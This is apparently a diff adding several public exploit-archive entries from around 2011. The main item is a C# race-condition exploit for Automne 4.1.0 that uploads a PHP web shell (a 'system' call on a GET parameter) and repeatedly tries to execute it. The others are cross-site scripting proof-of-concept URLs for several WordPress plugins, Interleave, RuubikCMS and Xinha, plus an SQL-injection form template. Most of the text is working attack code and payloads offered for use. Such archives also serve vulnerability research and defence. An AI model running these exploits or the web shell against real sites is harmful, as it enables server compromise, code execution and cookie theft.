 http://www.example.com/interleave-5.5.0.2-stable-20110227/basicstats.php?AjaxHandler=0<script>alert(0)<%2fscript>&e=1<script>alert(0)<%2fscript>&eid=2<script>alert(0)<%2fscript>&id=3<script>alert(0)<%2fscript>&recordid=4<script>alert(0)<%2fscript>&templateid=5<script>alert(0)<%2fscript>&fileid=6<script>alert(0)<%2fscript>&tid=7<script>alert(0)<%2fscript>&username=8<script>alert(0)<%2fscript>&password=9<script>alert(0)<%2fscript>&repository=10<script>alert(0)<%2fscript>&GetCSS=11<script>alert(0)<%2fscript>&GetjQueryUiPlacementJS=12<script>alert(0)<%2fscript>&ShowEntityList=13<script>alert(0)<%2fscript>&ShowTable=14<script>alert(0)<%2fscript>&nonavbar=15<script>alert(0)<%2fscript>&tab=16<script>alert(0)<%2fscript>&CT=17<script>alert(0)<%2fscript>
--- a/platforms/php/webapps/35417.php
+++ b/platforms/php/webapps/35417.php
@ -0,0 +1,145 @@
 source: http://www.securityfocus.com/bid/46774/info
 Automne is prone to an arbitrary-file-upload vulnerability.
 An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
 Automne 4.1.0 is vulnerable; other versions may also be affected. 
 Home Software Services Advisories Contact
 Automne 4.1.0 Race Condition
 // ------------------------------------------------------------------------
 // Software................Automne 4.1.0
 // Vulnerability...........Race Condition
 // Threat Level............Very Critical (5/5)
 // Download................http://en.automne-cms.org/
 // Release Date............3/6/2011
 // Tested On...............Windows Vista + XAMPP
 // ------------------------------------------------------------------------
 // Author..................AutoSec Tools
 // Site....................http://www.autosectools.com/
 // Email...................John Leitch <john@autosectools.com>
 // ........................Bryce Darling <bryce@autosectools.com>
 // ------------------------------------------------------------------------
 // 
 // 
 // --Description--
 // 
 // A race condition in Automne 4.1.0 can be exploited to bypass
 // validation performed on uploaded files. The following proof of concept
 // uploads a PHP script and then attempts to execute it before it is deleted.
 // 
 // 
 // --PoC--
 using System;
 using System.Collections.Generic;
 using System.Text;
 using System.Threading;
 using System.Diagnostics;
 using System.Net.Sockets;
 namespace RaceConditionExploit
 {
    class Program
    {
        static bool trying = true;
        static void SendReq(string req)
        {
            try
            {
                var bytes = ASCIIEncoding.ASCII.GetBytes(req);
                var client = new TcpClient();
                client.Connect("localhost", 80);
                using (var stream = client.GetStream())
                    stream.Write(bytes, 0, bytes.Length);
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
        static void CheckForCalc()
        {
            if (Process.GetProcessesByName("calc").Length != 0)
                trying = false;
        }
        static void Main()
        {
            var resets = new[]
            {
                new ManualResetEvent(false),
                new ManualResetEvent(false),
                new ManualResetEvent(false),
            };
            ThreadPool.QueueUserWorkItem(x =>
            {
                resets[0].WaitOne();
                while (trying)
                {
                    SendReq(@"POST /automne/automne/admin/upload-controler.php?atm-regen=shell.php HTTP/1.1
 Host: localhost
 Proxy-Connection: keep-alive
 User-Agent: x
 Content-Length: 193
 Cache-Control: max-age=0
 Origin: null
 Content-Type: multipart/form-data; boundary=----x
 Accept: text/html
 Accept-Encoding: gzip,deflate,sdch
 Accept-Language: en-US,en;q=0.8
 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
 ------x
 Content-Disposition: form-data; name=""Filedata""; filename=""shell.php""
 Content-Type: application/octet-stream
 <?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>
 ------x--
 ");
                    CheckForCalc();                    
                }
                resets[1].Set();
            });
            ThreadPool.QueueUserWorkItem(x =>
            {
                resets[0].WaitOne();
                while (trying)
                {
                    SendReq(@"GET http://localhost/automne/automne/upload/shell.php?CMD=calc.exe HTTP/1.1
 Host: localhost
 Connection: keep-alive
 Cache-Control: max-age=0
 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.119 Safari/534.16
 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 Accept-Encoding: gzip,deflate,sdch
 Accept-Language: en-US,en;q=0.8
 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
 Cookie: PHPSESSID=poiued4lsn8im03kb80t6131n3; osclass=9aae23cu0mqtopjv126loiu9n6; AutomneSession=mo70c3rth2qboupjpfbo010gv0
 ");
                    CheckForCalc();
                }
                resets[2].Set();
            });
            resets[0].Set();
            resets[1].WaitOne();
            resets[2].WaitOne();
        }
    }
 }
--- a/platforms/php/webapps/35418.txt
+++ b/platforms/php/webapps/35418.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/46781/info
 The Inline Gallery WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 Inline Gallery WordPress Plugin 0.3.9 is vulnerable; other versions may also be affected. 
 http://www.example.com/wp-content/plugins/inline-gallery/browser/browser.php?do=%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
--- a/platforms/php/webapps/35429.txt
+++ b/platforms/php/webapps/35429.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/46782/info
 The PhotoSmash Galleries WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 PhotoSmash Galleries WordPress Plugin 1.0.1 is vulnerable; other versions may also be affected. 
 http://www.example.com/wp-content/plugins/photosmash-galleries/index.php?action=%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
--- a/platforms/php/webapps/35430.txt
+++ b/platforms/php/webapps/35430.txt
@ -0,0 +1,15 @@
 source: http://www.securityfocus.com/bid/46783/info
 1 Flash Gallery is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.
 Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 1 Flash Gallery 0.2.5 is vulnerable; other versions may also be affected.
 http://www.example.com/wp-content/plugins/1-flash-gallery/folder.php?type=%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
 <form action="http://[host]/wp-content/plugins/1-flash-gallery/massedit_album.php" method="post" name="main" >
 <input type="hidden" name="album_id" value="1" />
 <input type="hidden" name="images" value="1" />
 <input type="hidden" name="gall_id" value="SQL_CODE_HERE" />
 <input type="submit" value="submit" name="submit" />
--- a/platforms/php/webapps/35431.txt
+++ b/platforms/php/webapps/35431.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/46794/info
 RuubikCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 RuubikCMS 1.0.3 is vulnerable; other versions may also be affected.
 http://www.example.com/ruubikcms/cms/includes/head.php?cmspage=</title><script>alert(123);</script> 
--- a/platforms/php/webapps/35435.txt
+++ b/platforms/php/webapps/35435.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/46823/info
 The Lazyest Gallery WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 Lazyest Gallery WordPress Plugin 1.0.26 is vulnerable; other versions may also be affected. 
 http://www.example.com/wp-content/plugins/lazyest-gallery/lazyest-popup.php?image=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
--- a/platforms/php/webapps/35436.txt
+++ b/platforms/php/webapps/35436.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/46825/info
 Xinha is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
 Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
 Xinha 0.96.1 is vulnerable; prior versions may also be affected. Note that applications that use vulnerable versions of Xinha may also be affected. 
 http://www.example.com/wikiwig5.01/_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert(0)%3C%2fscript%3E